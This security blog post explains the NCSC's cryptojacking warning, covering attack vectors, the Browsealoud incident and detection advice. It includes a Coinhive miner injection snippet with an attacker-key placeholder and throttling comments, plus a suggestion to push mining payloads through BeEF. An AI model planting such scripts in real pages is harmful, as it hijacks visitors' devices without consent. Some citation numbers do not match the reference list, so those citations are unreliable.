The National Cyber Security Centre (NCSC) has issued a warning about the increasing use of malicious software to illegally mine cryptocurrency. This practice, known as cryptojacking, hijacks the processing power of unsuspecting users' devices to mine digital currency for the attacker. In practice the target is almost always Monero, whose proof-of-work is designed to run on ordinary CPUs, rather than Bitcoin, which commodity hardware cannot mine profitably. The NCSC's guidance targets members of the public, website administrators, and JavaScript developers, urging them to take proactive measures to mitigate risks[1].
Key Points
- Cryptojacking involves using malicious software to mine cryptocurrency on victims’ devices without their consent.
- The NCSC has issued guidance for the public, website administrators, and developers to combat this threat.
- Attackers often exploit vulnerabilities in websites, plugins, or JavaScript to deploy cryptojacking scripts.
- Affected devices may experience degraded performance, increased power consumption, and potential hardware damage.
- Red Teams, Blue Teams, and SOC analysts should focus on detecting and mitigating cryptojacking activity through monitoring and patching vulnerabilities.
What is Cryptojacking?
Cryptojacking is a form of cyberattack in which malicious actors exploit vulnerabilities in websites, software, or operating systems to run cryptomining code on victims' devices. That code uses the device's processing power to compute proof-of-work hashes, and any block reward or mining-pool payout goes to the attacker[10]. Unlike ransomware or data theft, cryptojacking often goes unnoticed: it does not directly harm the victim's data, but it can severely degrade system performance and drive up power consumption.
How Cryptojacking Works
- Exploitation of Vulnerabilities: Attackers target vulnerabilities in web plugins, JavaScript libraries, or server-side applications to inject cryptomining scripts.
- Browser-Based Attacks: Malicious JavaScript code embedded in websites can mine cryptocurrency using the visitor’s browser.
- Persistent Attacks: Some browser-based miners keep running after the user appears to leave the infected site, typically by opening a small pop-under window hidden behind the taskbar, while installed cryptojacking malware simply runs as a background process or service[10].
Technical Details: How Cryptojacking is Deployed
Common Attack Vectors
- Compromised Plugins: In February 2018, attackers modified the hosted JavaScript of a popular accessibility plugin, Browsealoud, so that every page loading it also loaded a Coinhive miner; over 4,000 websites, including UK government portals, were affected[5].
- JavaScript Injection: Malicious actors inject cryptomining scripts into websites, often leveraging third-party libraries or ad networks.
- Malware Distribution: Cryptojacking malware can be distributed through weaponized mobile apps, botnets, or social engineering tactics[10].
Example: Coinhive Script
One of the most notorious cryptojacking scripts was Coinhive, a hosted JavaScript miner for Monero that ran in the visitor's browser and credited the earnings to whoever owned the site key passed to it. Coinhive shut down in March 2019, but the loader pattern it popularised is still what injected miners look like. Below is how such a script was typically injected into a page:
<!-- load the hosted miner library from the third-party domain -->
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>
// the argument is the attacker's Coinhive site key (not a wallet address);
// Coinhive paid out to the owner of the key
var miner = new CoinHive.Anonymous('ATTACKER_SITE_KEY');
// start hashing in Web Workers; an optional throttle kept CPU use below 100%
// so the visitor was less likely to notice
miner.start();
</script>
Once embedded, the script mines Monero with the visitor's CPU for as long as the tab stays open, with no consent and no visible indication.
Relevance to Red Teams, Blue Teams, and SOC Analysts
For Red Teams
- Simulate Cryptojacking Attacks: Red Teams can use tools like BeEF (Browser Exploitation Framework), which pushes arbitrary JavaScript into hooked browsers, to deliver a throttled mining payload and test whether endpoint and network controls notice it.
- Exploit Vulnerabilities: Test for vulnerabilities in third-party plugins and JavaScript libraries that could be exploited for cryptojacking.
For Blue Teams and SOC Analysts
- Monitor CPU Usage: Unusual spikes in CPU usage on endpoints or servers may indicate cryptojacking activity.
- Block Known Malicious Domains: Use blocklists to prevent access to known cryptojacking domains like coinhive.com.
- Patch Vulnerabilities: Regularly update plugins, libraries, and software to mitigate exploitation risks.
Detection and Mitigation
- YARA Rules: Use YARA rules to detect cryptojacking payloads in files and process memory; for detection on the wire, put the same indicators into IDS signatures (Suricata or Snort), since YARA does not inspect live traffic by itself.
- SIEM Alerts: Configure SIEM tools to alert on unusual CPU activity or connections to known cryptojacking domains.
- Browser Extensions: Deploy browser extensions like NoCoin to block cryptojacking scripts.
Remediation Steps
- Update Software: Ensure all plugins, libraries, and software are up to date to prevent exploitation.
- Use Antivirus Software: Deploy antivirus solutions capable of detecting cryptojacking malware.
- Monitor Network Traffic: Regularly inspect network traffic for connections to known cryptojacking domains.
- Educate Users: Train employees and users to recognize signs of cryptojacking, such as slow device performance or overheating.
- Implement Application Allowlisting: Restrict the execution of unauthorized scripts or applications on endpoints.
Conclusion
Cryptojacking represents a growing threat to both individuals and organizations, leveraging victims’ devices to generate cryptocurrency for attackers. The NCSC’s guidance highlights the importance of vigilance and proactive measures to combat this issue. For Red Teams, Blue Teams, and SOC analysts, understanding the technical mechanisms of cryptojacking and implementing robust detection and mitigation strategies is crucial.
As long as cryptocurrency prices and easy access to other people's compute keep mining profitable, attackers will keep exploiting vulnerabilities for this kind of financial gain. Staying informed and prepared is the best defense against this evolving threat.
References
- National Cyber Security Centre (2024). “NCSC advice: Malicious software used to illegally mine cryptocurrency”. NCSC. Retrieved 2024.
- BBC News (2018). “Hackers hijack government websites to mine crypto-cash”. BBC. Retrieved 2024.
- CISA (2024). “Defending Against Illicit Cryptocurrency Mining Activity”. CISA. Retrieved 2024.